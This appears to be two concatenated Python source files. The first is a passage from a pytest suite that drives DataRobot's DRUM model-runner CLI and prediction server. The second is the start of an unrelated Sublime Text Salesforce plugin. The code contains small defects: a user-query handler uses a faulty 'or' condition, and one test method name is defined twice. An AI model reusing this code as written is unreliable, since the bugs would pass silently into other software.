(None, BINARY): None,
(SKLEARN, REGRESSION): os.path.join(cls.tests_artifacts_path, "sklearn_reg.pkl"),
(SKLEARN, REGRESSION_INFERENCE): os.path.join(
cls.tests_artifacts_path, "sklearn_reg.pkl"
),
(MULTI_ARTIFACT, REGRESSION): [
os.path.join(cls.tests_artifacts_path, "sklearn_reg.pkl"),
os.path.join(cls.tests_artifacts_path, "keras_reg.h5"),
],
(CODEGEN_AND_SKLEARN, REGRESSION): [
os.path.join(cls.tests_artifacts_path, "java_reg.jar"),
os.path.join(cls.tests_artifacts_path, "sklearn_reg.pkl"),
],
(SKLEARN, BINARY): os.path.join(cls.tests_artifacts_path, "sklearn_bin.pkl"),
(KERAS, REGRESSION): os.path.join(cls.tests_artifacts_path, "keras_reg.h5"),
(KERAS, BINARY): os.path.join(cls.tests_artifacts_path, "keras_bin.h5"),
(XGB, REGRESSION): os.path.join(cls.tests_artifacts_path, "xgb_reg.pkl"),
(XGB, BINARY): os.path.join(cls.tests_artifacts_path, "xgb_bin.pkl"),
(PYTORCH, REGRESSION): [
os.path.join(cls.tests_artifacts_path, "torch_reg.pth"),
os.path.join(cls.tests_artifacts_path, "PyTorch.py"),
],
(PYTORCH, BINARY): [
os.path.join(cls.tests_artifacts_path, "torch_bin.pth"),
os.path.join(cls.tests_artifacts_path, "PyTorch.py"),
],
(RDS, REGRESSION): os.path.join(cls.tests_artifacts_path, "r_reg.rds"),
(RDS, BINARY): os.path.join(cls.tests_artifacts_path, "r_bin.rds"),
(CODEGEN, REGRESSION): os.path.join(cls.tests_artifacts_path, "java_reg.jar"),
(CODEGEN, BINARY): os.path.join(cls.tests_artifacts_path, "java_bin.jar"),
(POJO, REGRESSION): os.path.join(
cls.tests_artifacts_path,
"pojo_reg",
"drf_887c2e5b_0941_40b7_ae26_cae274c4b424.java",
),
(POJO, BINARY): os.path.join(
cls.tests_artifacts_path,
"pojo_bin",
"XGBoost_grid__1_AutoML_20200717_163214_model_159.java",
),
(MOJO, REGRESSION): os.path.join(cls.tests_artifacts_path, "mojo_reg.zip"),
(MOJO, BINARY): os.path.join(cls.tests_artifacts_path, "mojo_bin.zip"),
(PYPMML, REGRESSION): os.path.join(cls.tests_artifacts_path, "iris_reg.pmml"),
(PYPMML, BINARY): os.path.join(cls.tests_artifacts_path, "iris_bin.pmml"),
}
cls.target = {BINARY: "Species", REGRESSION: "MEDV"}
cls.class_labels = {
(SKLEARN, BINARY): ["Iris-setosa", "Iris-versicolor"],
(XGB, BINARY): ["Iris-setosa", "Iris-versicolor"],
(KERAS, BINARY): ["Iris-setosa", "Iris-versicolor"],
(RDS, BINARY): ["Iris-setosa", "Iris-versicolor"],
(PYPMML, BINARY): ["Iris-setosa", "Iris-versicolor"],
}
@classmethod
def teardown_class(cls):
pass
@staticmethod
def _exec_shell_cmd(cmd, err_msg, assert_if_fail=True, process_obj_holder=None, env=os.environ):
p = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
env=env,
universal_newlines=True,
)
if process_obj_holder is not None:
process_obj_holder.process = p
(stdout, stderr) = p.communicate()
if process_obj_holder is not None:
process_obj_holder.out_stream = stdout
process_obj_holder.err_stream = stderr
if p.returncode != 0:
print("stdout: {}".format(stdout))
print("stderr: {}".format(stderr))
if assert_if_fail:
assert p.returncode == 0, err_msg
return p, stdout, stderr
@classmethod
def _create_custom_model_dir(
cls, custom_model_dir, framework, problem, language, is_training=False, nested=False
):
if nested:
custom_model_dir = custom_model_dir.joinpath("nested_dir")
custom_model_dir.mkdir(parents=True, exist_ok=True)
if is_training:
model_template_dir = cls.paths_to_training_models[(language, framework)]
if language == PYTHON:
files = glob.glob(r"{}/*.py".format(model_template_dir))
elif language in [R, R_ALL_HOOKS, R_FIT]:
files = glob.glob(r"{}/*.r".format(model_template_dir)) + glob.glob(
r"{}/*.R".format(model_template_dir)
)
for filename in files:
shutil.copy2(filename, custom_model_dir)
else:
artifact_filenames = cls._get_artifact_filename(framework, problem)
if artifact_filenames is not None:
if not isinstance(artifact_filenames, list):
artifact_filenames = [artifact_filenames]
for filename in artifact_filenames:
shutil.copy2(filename, custom_model_dir)
fixture_filename, rename = cls._get_fixture_filename(language)
if fixture_filename:
shutil.copy2(fixture_filename, os.path.join(custom_model_dir, rename))
return custom_model_dir
@classmethod
def _get_artifact_filename(cls, framework, problem):
return cls.artifacts[(framework, problem)]
@classmethod
def _get_class_labels(cls, framework, problem):
return cls.class_labels.get((framework, problem), None)
@classmethod
def _get_dataset_filename(cls, framework, problem):
framework_key = framework
problem_key = problem
# if specific dataset for framework was not defined,
# use default dataset for this problem, e.g. (None, problem)
framework_key = None if (framework_key, problem_key) not in cls.datasets else framework_key
return cls.datasets[(framework_key, problem_key)]
@classmethod
def _get_fixture_filename(cls, language):
return cls.fixtures[language]
@classmethod
def _cmd_add_class_labels(cls, cmd, framework, problem):
if problem != BINARY:
return cmd
labels = cls._get_class_labels(framework, problem)
pos = labels[1] if labels else "yes"
neg = labels[0] if labels else "no"
cmd = cmd + " --positive-class-label {} --negative-class-label {}".format(pos, neg)
return cmd
@pytest.mark.parametrize(
"framework, problem, language, docker",
[
(SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, None),
(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),
(SKLEARN, BINARY, PYTHON, None),
(KERAS, REGRESSION, PYTHON, None),
(KERAS, BINARY, PYTHON, None),
(XGB, REGRESSION, PYTHON, None),
(XGB, BINARY, PYTHON, None),
(XGB, BINARY, PYTHON_XGBOOST_CLASS_LABELS_VALIDATION, None),
(PYTORCH, REGRESSION, PYTHON, None),
(PYTORCH, BINARY, PYTHON, None),
(RDS, REGRESSION, R, None),
(RDS, BINARY, R, None),
(CODEGEN, REGRESSION, NO_CUSTOM, None),
(CODEGEN, BINARY, NO_CUSTOM, None),
(POJO, REGRESSION, NO_CUSTOM, None),
(POJO, BINARY, NO_CUSTOM, None),
(MOJO, REGRESSION, NO_CUSTOM, None),
(MOJO, BINARY, NO_CUSTOM, None),
(MULTI_ARTIFACT, REGRESSION, PYTHON_LOAD_MODEL, None),
(PYPMML, REGRESSION, NO_CUSTOM, None),
(PYPMML, BINARY, NO_CUSTOM, None),
],
)
def test_custom_models_with_drum(self, framework, problem, language, docker, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
output = tmp_path / "output"
cmd = "{} score --code-dir {} --input {} --output {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset, output
)
cmd = self._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {} --verbose ".format(docker)
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
in_data = pd.read_csv(input_dataset)
out_data = pd.read_csv(output)
assert in_data.shape[0] == out_data.shape[0]
@pytest.mark.parametrize(
"framework, problem, language", [(SKLEARN, BINARY, PYTHON), (RDS, BINARY, R)]
)
def test_bin_models_with_wrong_labels(self, framework, problem, language, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} score --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
if problem == BINARY:
cmd = cmd + " --positive-class-label yes --negative-class-label no"
p, stdo, stde = TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
)
stdo_stde = str(stdo) + str(stde)
if framework == SKLEARN:
assert (
str(stdo_stde).find(
"Wrong class labels. Use class labels detected by sklearn model"
)
!= -1
)
elif framework == RDS:
assert (
str(stdo_stde).find(
"Wrong class labels. Use class labels according to your dataset"
)
!= -1
)
# testing negative cases: no artifact, no custom;
@pytest.mark.parametrize(
"framework, problem, language",
[
(None, REGRESSION, NO_CUSTOM), # no artifact, no custom
(SKLEARN, REGRESSION, R), # python artifact, custom.R
(RDS, REGRESSION, PYTHON), # R artifact, custom.py
(None, REGRESSION, R), # no artifact, custom.R without load_model
(None, REGRESSION, PYTHON), # no artifact, custom.py without load_model
],
)
def test_detect_language(self, framework, problem, language, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} score --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
if problem == BINARY:
cmd = cmd + " --positive-class-label yes --negative-class-label no"
p, stdo, stde = TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
)
stdo_stde = str(stdo) + str(stde)
cases_1_2_3 = (
str(stdo_stde).find("Can not detect language by artifacts and/or custom.py/R files")
!= -1
)
case_4 = (
str(stdo_stde).find(
"Could not find a serialized model artifact with .rds extension, supported by default R predictor. "
"If your artifact is not supported by default predictor, implement custom.load_model hook."
)
!= -1
)
case_5 = (
str(stdo_stde).find(
"Could not find model artifact file in: {} supported by default predictors".format(
custom_model_dir
)
)
!= -1
)
assert any([cases_1_2_3, case_4, case_5])
# testing negative cases: no artifact, no custom;
@pytest.mark.parametrize(
"framework, problem, language, set_language",
[
(SKLEARN, REGRESSION_INFERENCE, R, "python"), # python artifact, custom.R
(RDS, REGRESSION, PYTHON, "r"), # R artifact, custom.py
(CODEGEN, REGRESSION, PYTHON, "java"), # java artifact, custom.py
(
CODEGEN_AND_SKLEARN,
REGRESSION,
NO_CUSTOM,
"java",
), # java and sklearn artifacts, no custom.py
(
CODEGEN_AND_SKLEARN,
REGRESSION,
NO_CUSTOM,
"python",
), # java and sklearn artifacts, no custom.py
# Negative cases
(SKLEARN, REGRESSION_INFERENCE, R, None), # python artifact, custom.R
(RDS, REGRESSION, PYTHON, None), # R artifact, custom.py
(CODEGEN, REGRESSION, PYTHON, None), # java artifact, custom.py
(
CODEGEN_AND_SKLEARN,
REGRESSION,
NO_CUSTOM,
None,
), # java and sklearn artifacts, no custom.py
(
CODEGEN_AND_SKLEARN,
REGRESSION,
NO_CUSTOM,
"r",
), # java and sklearn artifacts, no custom.py
],
)
def test_set_language(self, framework, problem, language, set_language, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} score --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
if set_language:
cmd += " --language {}".format(set_language)
if problem == BINARY:
cmd += " --positive-class-label yes --negative-class-label no"
p, stdo, stde = TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
)
if not set_language:
stdo_stde = str(stdo) + str(stde)
cases_4_5_6_7 = (
str(stdo_stde).find("Can not detect language by artifacts and/or custom.py/R files")
!= -1
)
assert cases_4_5_6_7
if framework == CODEGEN_AND_SKLEARN and set_language == "r":
stdo_stde = str(stdo) + str(stde)
case = (
str(stdo_stde).find(
"Could not find a serialized model artifact with .rds extension, supported by default R predictor. "
"If your artifact is not supported by default predictor, implement custom.load_model hook."
)
!= -1
)
assert case
@pytest.mark.parametrize(
"framework, language", [(SKLEARN, PYTHON_ALL_HOOKS), (RDS, R_ALL_HOOKS)]
)
def test_custom_model_with_all_predict_hooks(self, framework, language, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, REGRESSION, language)
input_dataset = self._get_dataset_filename(framework, REGRESSION)
output = tmp_path / "output"
cmd = "{} score --code-dir {} --input {} --output {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset, output
)
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
preds = pd.read_csv(output)
assert all(
val for val in (preds["Predictions"] == len(CustomHooks.ALL_PREDICT)).values
), preds
@staticmethod
def run_server_thread(cmd, process_obj_holder):
TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
process_obj_holder=process_obj_holder,
)
@staticmethod
def wait_for_server(url, timeout, process_holder):
# waiting for ping to succeed
while True:
try:
response = requests.get(url)
if response.ok:
break
except Exception:
pass
time.sleep(1)
timeout -= 1
if timeout <= 0:
if process_holder is not None:
print("Killing subprocess: {}".format(process_holder.process.pid))
os.killpg(os.getpgid(process_holder.process.pid), signal.SIGTERM)
time.sleep(0.25)
os.killpg(os.getpgid(process_holder.process.pid), signal.SIGKILL)
assert timeout, "Server failed to start: url: {}".format(url)
@pytest.mark.parametrize(
"framework, problem, language, docker",
[
(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),
(SKLEARN, BINARY, PYTHON, None),
(KERAS, REGRESSION, PYTHON, None),
(KERAS, BINARY, PYTHON, None),
(XGB, REGRESSION, PYTHON, None),
(XGB, BINARY, PYTHON, None),
(PYTORCH, REGRESSION, PYTHON, None),
(PYTORCH, BINARY, PYTHON, None),
(RDS, REGRESSION, R, None),
(RDS, BINARY, R, None),
(CODEGEN, REGRESSION, NO_CUSTOM, None),
(CODEGEN, BINARY, NO_CUSTOM, None),
(MOJO, REGRESSION, NO_CUSTOM, None),
(MOJO, BINARY, NO_CUSTOM, None),
(POJO, REGRESSION, NO_CUSTOM, None),
(POJO, BINARY, NO_CUSTOM, None),
(MULTI_ARTIFACT, REGRESSION, PYTHON_LOAD_MODEL, None),
(PYPMML, REGRESSION, NO_CUSTOM, None),
(PYPMML, BINARY, NO_CUSTOM, None),
],
)
def test_custom_models_with_drum_prediction_server(
self, framework, problem, language, docker, tmp_path
):
custom_model_dir = tmp_path / "custom_model"
TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)
with DrumServerRun(framework, problem, custom_model_dir, docker) as run:
input_dataset = self._get_dataset_filename(framework, problem)
# do predictions
response = requests.post(
run.url_server_address + "/predict/", files={"X": open(input_dataset)}
)
print(response.text)
assert response.ok
actual_num_predictions = len(json.loads(response.text)[RESPONSE_PREDICTIONS_KEY])
in_data = pd.read_csv(input_dataset)
assert in_data.shape[0] == actual_num_predictions
@pytest.mark.parametrize(
"framework, problem, language, docker",
[(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN), (SKLEARN, BINARY, PYTHON, None)],
)
def test_custom_models_drum_prediction_server_response(
self, framework, problem, language, docker, tmp_path
):
custom_model_dir = tmp_path / "custom_model"
TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)
with DrumServerRun(framework, problem, custom_model_dir, docker) as run:
input_dataset = self._get_dataset_filename(framework, problem)
# do predictions
response = requests.post(
run.url_server_address + "/predict/", files={"X": open(input_dataset)}
)
assert response.ok
response_json = json.loads(response.text)
assert isinstance(response_json, dict)
assert RESPONSE_PREDICTIONS_KEY in response_json
predictions_list = response_json[RESPONSE_PREDICTIONS_KEY]
assert isinstance(predictions_list, list)
assert len(predictions_list)
prediction_item = predictions_list[0]
if problem == BINARY:
assert isinstance(prediction_item, dict)
assert len(prediction_item) == 2
assert all([isinstance(x, str) for x in prediction_item.keys()])
assert all([isinstance(x, float) for x in prediction_item.values()])
elif problem == REGRESSION:
assert isinstance(prediction_item, float)
@pytest.mark.parametrize(
"framework, problem, language, docker",
[(SKLEARN, BINARY, PYTHON, None), (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN)],
)
def test_custom_models_perf_test(self, framework, problem, language, docker, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} perf-test -i 10 -s 1000 --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
cmd = self._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {}".format(docker)
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
@pytest.mark.parametrize(
"framework, problem, language, docker",
[
(SKLEARN, BINARY, PYTHON, None),
(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),
(SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, None),
(SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, DOCKER_PYTHON_SKLEARN),
],
)
def test_custom_models_validation_test(self, framework, problem, language, docker, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(custom_model_dir, framework, problem, language)
input_dataset = self._get_dataset_filename(framework, problem)
cmd = "{} validation --code-dir {} --input {}".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset
)
cmd = self._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {}".format(docker)
p, stdo, stde = TestCMRunner._exec_shell_cmd(
cmd,
"Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd),
assert_if_fail=False,
)
if language == NO_CUSTOM:
assert re.search(r"Null value imputation\s+FAILED", stdo)
else:
assert re.search(r"Null value imputation\s+PASSED", stdo)
@pytest.mark.parametrize("language, language_suffix", [("python", ".py"), ("r", ".R")])
def test_template_creation(self, language, language_suffix, tmp_path):
print("Running template creation tests: {}".format(language))
directory = tmp_path / "template_test_{}".format(uuid4())
cmd = "{drum_prog} new model --language {language} --code-dir {directory}".format(
drum_prog=ArgumentsOptions.MAIN_COMMAND, language=language, directory=directory
)
TestCMRunner._exec_shell_cmd(
cmd, "Failed creating a template for custom model, cmd={}".format(cmd)
)
assert os.path.isdir(directory), "Directory {} does not exists (or not a dir)".format(
directory
)
assert os.path.isfile(os.path.join(directory, "README.md"))
custom_file = os.path.join(directory, CUSTOM_FILE_NAME + language_suffix)
assert os.path.isfile(custom_file)
@staticmethod
def _add_weights_cmd(weights, input_csv):
df = pd.read_csv(input_csv)
colname = "some-colname"
weights_data = pd.Series(np.random.randint(1, 3, len(df)))
__keep_this_around = NamedTemporaryFile("w")
if weights == WEIGHTS_ARGS:
df[colname] = weights_data
df.to_csv(__keep_this_around.name)
return " --row-weights " + colname, __keep_this_around.name, __keep_this_around
elif weights == WEIGHTS_CSV:
weights_data.to_csv(__keep_this_around.name)
return " --row-weights-csv " + __keep_this_around.name, input_csv, __keep_this_around
return "", input_csv, __keep_this_around
@pytest.mark.parametrize("framework", [RDS, SKLEARN, XGB, KERAS, PYTORCH])
@pytest.mark.parametrize("problem", [BINARY, REGRESSION])
@pytest.mark.parametrize("docker", [DOCKER_PYTHON_SKLEARN, None])
@pytest.mark.parametrize("weights", [WEIGHTS_CSV, WEIGHTS_ARGS, None])
@pytest.mark.parametrize("use_output", [True, False])
@pytest.mark.parametrize("nested", [True, False])
def test_fit(self, framework, problem, docker, weights, use_output, tmp_path, nested):
if docker and framework != SKLEARN:
return
if framework == RDS:
language = R_FIT
else:
language = PYTHON
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(
custom_model_dir,
framework,
problem,
language,
is_training=True,
nested=nested if language == PYTHON else False, # TODO: support nested R files
)
input_dataset = self._get_dataset_filename(framework, problem)
weights_cmd, input_dataset, __keep_this_around = self._add_weights_cmd(
weights, input_dataset
)
output = tmp_path / "output"
output.mkdir()
cmd = "{} fit --code-dir {} --target {} --input {} --verbose ".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, self.target[problem], input_dataset
)
if use_output:
cmd += " --output {}".format(output)
if problem == BINARY:
cmd = self._cmd_add_class_labels(cmd, framework, problem)
if docker:
cmd += " --docker {} ".format(docker)
cmd += weights_cmd
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
def _create_fit_input_data_dir(self, input_dir, problem, weights):
input_dir.mkdir(parents=True, exist_ok=True)
input_dataset = self._get_dataset_filename(None, problem)
df = pd.read_csv(input_dataset)
# Training data
with open(os.path.join(input_dir, "X.csv"), "w+") as fp:
feature_df = df.loc[:, df.columns != self.target[problem]]
feature_df.to_csv(fp, index=False)
# Target data
with open(os.path.join(input_dir, "y.csv"), "w+") as fp:
target_series = df[self.target[problem]]
target_series.to_csv(fp, index=False, header="Target")
# Weights data
if weights:
df = pd.read_csv(input_dataset)
weights_data = pd.Series(np.random.randint(1, 3, len(df)))
with open(os.path.join(input_dir, "weights.csv"), "w+") as fp:
weights_data.to_csv(fp, header=False)
@pytest.mark.parametrize("framework", [SKLEARN, XGB, KERAS])
@pytest.mark.parametrize("problem", [BINARY, REGRESSION])
@pytest.mark.parametrize("language", [PYTHON])
@pytest.mark.parametrize("weights", [WEIGHTS_CSV, None])
def test_fit_sh(self, framework, problem, language, weights, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(
custom_model_dir, framework, problem, language, is_training=True
)
env = os.environ
fit_sh = os.path.join(
self.tests_root_path,
"..",
"public_dropin_environments/{}_{}/fit.sh".format(language, framework),
)
input_dir = tmp_path / "input_dir"
self._create_fit_input_data_dir(input_dir, problem, weights)
output = tmp_path / "output"
output.mkdir()
env["CODEPATH"] = str(custom_model_dir)
env["INPUT_DIRECTORY"] = str(input_dir)
env["ARTIFACT_DIRECTORY"] = str(output)
if problem == BINARY:
labels = self._get_class_labels(framework, problem)
env["NEGATIVE_CLASS_LABEL"] = labels[0]
env["POSITIVE_CLASS_LABEL"] = labels[1]
else:
if os.environ.get("NEGATIVE_CLASS_LABEL"):
del os.environ["NEGATIVE_CLASS_LABEL"]
del os.environ["POSITIVE_CLASS_LABEL"]
TestCMRunner._exec_shell_cmd(fit_sh, "Failed cmd {}".format(fit_sh), env=env)
def test_fit_simple(self, tmp_path):
custom_model_dir = tmp_path / "custom_model"
self._create_custom_model_dir(
custom_model_dir, SIMPLE, REGRESSION, PYTHON, is_training=True, nested=True
)
input_dataset = self._get_dataset_filename(SKLEARN, REGRESSION)
output = tmp_path / "output"
output.mkdir()
cmd = "{} fit --code-dir {} --target {} --input {} --verbose".format(
ArgumentsOptions.MAIN_COMMAND, custom_model_dir, self.target[REGRESSION], input_dataset,
)
TestCMRunner._exec_shell_cmd(
cmd, "Failed in {} command line! {}".format(ArgumentsOptions.MAIN_COMMAND, cmd)
)
class TestDrumRuntime:
@classmethod
def setup_class(cls):
TestCMRunner.setup_class()
Options = collections.namedtuple(
"Options",
"with_error_server {} docker address verbose show_stacktrace".format(
CMRunnerArgsRegistry.SUBPARSER_DEST_KEYWORD
),
defaults=[RunMode.SERVER, None, "localhost", False, True],
)
class StubDrumException(Exception):
pass
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_no_exceptions(self, mock_run_error_server):
with DrumRuntime():
pass
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_no_options(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime():
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_initialization_succeeded(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(False)
runtime.initialization_succeeded = True
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_not_server_mode(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(False, RunMode.SCORE)
runtime.initialization_succeeded = False
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_not_server_mode(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(False, RunMode.SERVER, "path_to_image")
runtime.initialization_succeeded = False
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_no_with_error_server(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(False)
runtime.initialization_succeeded = False
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_not_called()
@mock.patch("datarobot_drum.drum.runtime.run_error_server")
def test_exception_with_error_server(self, mock_run_error_server):
with pytest.raises(TestDrumRuntime.StubDrumException):
with DrumRuntime() as runtime:
runtime.options = TestDrumRuntime.Options(True)
runtime.initialization_succeeded = False
raise TestDrumRuntime.StubDrumException()
mock_run_error_server.assert_called()
@pytest.fixture(params=[REGRESSION, BINARY])
def params(self, request, tmp_path):
framework = SKLEARN
language = PYTHON
problem = request.param
custom_model_dir = tmp_path / "custom_model"
TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)
server_run_args = dict(
framework=framework, problem=problem, custom_model_dir=custom_model_dir,
)
return framework, problem, custom_model_dir, server_run_args
def assert_drum_server_run_failure(self, server_run_args, with_error_server, error_message):
drum_server_run = DrumServerRun(**server_run_args, with_error_server=with_error_server)
if with_error_server:
# assert that error the server is up and message is propagated via API
with drum_server_run as run:
# check /health/ route
response = requests.get(run.url_server_address + "/health/")
assert response.status_code == 513
assert error_message in response.json()["message"]
# check /predict/ route
response = requests.post(run.url_server_address + "/predict/")
assert response.status_code == 513
assert error_message in response.json()["message"]
else:
# DrumServerRun tries to ping the server.
# assert that the process is already dead we it's done.
with pytest.raises(ProcessLookupError), drum_server_run:
pass
assert drum_server_run.process.returncode == 1
assert error_message in drum_server_run.process.err_stream
@pytest.mark.parametrize("with_error_server", [False, True])
def test_e2e_no_model_artifact(self, params, with_error_server):
"""
Verify that if an error occurs on drum server initialization if no model artifact is found
- if '--with-error-server' is not set, drum server process will exit with error
- if '--with-error-server' is set, 'error server' will still be started, and
will be serving initialization error
"""
_, _, custom_model_dir, server_run_args = params
error_message = "Could not find model artifact file"
# remove model artifact
for item in os.listdir(custom_model_dir):
if item.endswith(PythonArtifacts.PKL_EXTENSION):
os.remove(os.path.join(custom_model_dir, item))
self.assert_drum_server_run_failure(server_run_args, with_error_server, error_message)
@pytest.mark.parametrize("with_error_server", [False, True])
def test_e2e_model_loading_fails(self, params, with_error_server):
"""
Verify that if an error occurs on drum server initialization if model cannot load properly
- if '--with-error-server' is not set, drum server process will exit with error
- if '--with-error-server' is set, 'error server' will still be started, and
will be serving initialization error
"""
_, _, custom_model_dir, server_run_args = params
error_message = (
"Could not find any framework to handle loaded model and a score hook is not provided"
)
# make model artifact invalid by erasing its content
for item in os.listdir(custom_model_dir):
if item.endswith(PythonArtifacts.PKL_EXTENSION):
with open(os.path.join(custom_model_dir, item), "wb") as f:
f.write(pickle.dumps("invalid model content"))
self.assert_drum_server_run_failure(server_run_args, with_error_server, error_message)
@pytest.mark.parametrize("with_error_server", [False, True])
def test_e2e_predict_fails(self, params, with_error_server):
"""
Verify that when drum server is started, if an error occurs on /predict/ route,
'error server' is not started regardless '--with-error-server' flag.
"""
framework, problem, custom_model_dir, server_run_args = params
# remove a module required during processing of /predict/ request
os.remove(os.path.join(custom_model_dir, "custom.py"))
drum_server_run = DrumServerRun(**server_run_args, with_error_server=with_error_server)
with drum_server_run as run:
input_dataset = TestCMRunner._get_dataset_filename(framework, problem)
response = requests.post(
run.url_server_address + "/predict/", files={"X": open(input_dataset)}
)
assert response.status_code == 500 # error occurs
# assert that 'error server' is not started.
# as 'error server' propagates errors with 513 status code,
# assert that after error occurred, the next request is not 513
# check /health/ route
response = requests.get(run.url_server_address + "/health/")
assert response.status_code == 200
# check /predict/ route
response = requests.post(run.url_server_address + "/predict/")
error_message = "ERROR: Samples should be provided as a csv file under `X` key."
assert response.status_code == 422
assert response.json()["message"] == error_message
assert drum_server_run.process.returncode == 0
|
processor.py
|
import sublime
import sublime_plugin
import os
import xml
import urllib
import json
import threading
import time
import pprint
import urllib.parse
import shutil
import datetime
import math
from xml.sax.saxutils import unescape
from . import requests, context, util
from .context import COMPONENT_METADATA_SETTINGS
from .salesforce import soap, message
from .salesforce.api.bulk import BulkJob
from .salesforce.api.bulk import BulkApi
from .salesforce.api.metadata import MetadataApi
from .salesforce.api.tooling import ToolingApi
from .salesforce.api.apex import ApexApi
from .salesforce.lib.panel import Printer
from .progress import ThreadProgress, ThreadsProgress
from .salesforce.lib import diff
def handle_populate_users(callback_command, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
if api.result or api.result["success"]:
records = api.result["records"]
users = {}
for record in records:
if not record["FirstName"]:
name = "%s => %s" % (record["LastName"], record["Username"])
else:
name = "%s => %s" % (
"%s %s" % (record["LastName"], record["FirstName"]),
record["Username"]
)
users[name] = record["Id"]
util.add_config_history("users", users, settings)
sublime.active_window().run_command(callback_command)
# If sobjects is exist in `/.config/users.json`, just return it
settings = context.get_settings()
user_cache = os.path.join(settings["workspace"], ".config", "users.json")
if os.path.isfile(user_cache): return json.loads(open(user_cache).read())
# If not exist, we need to use callback function
api = ToolingApi(settings)
query = "SELECT Id, FirstName, LastName, Username FROM User WHERE IsActive = true"
thread = threading.Thread(target=api.query_all, args=(query, ))
thread.start()
handle_thread(thread, timeout)
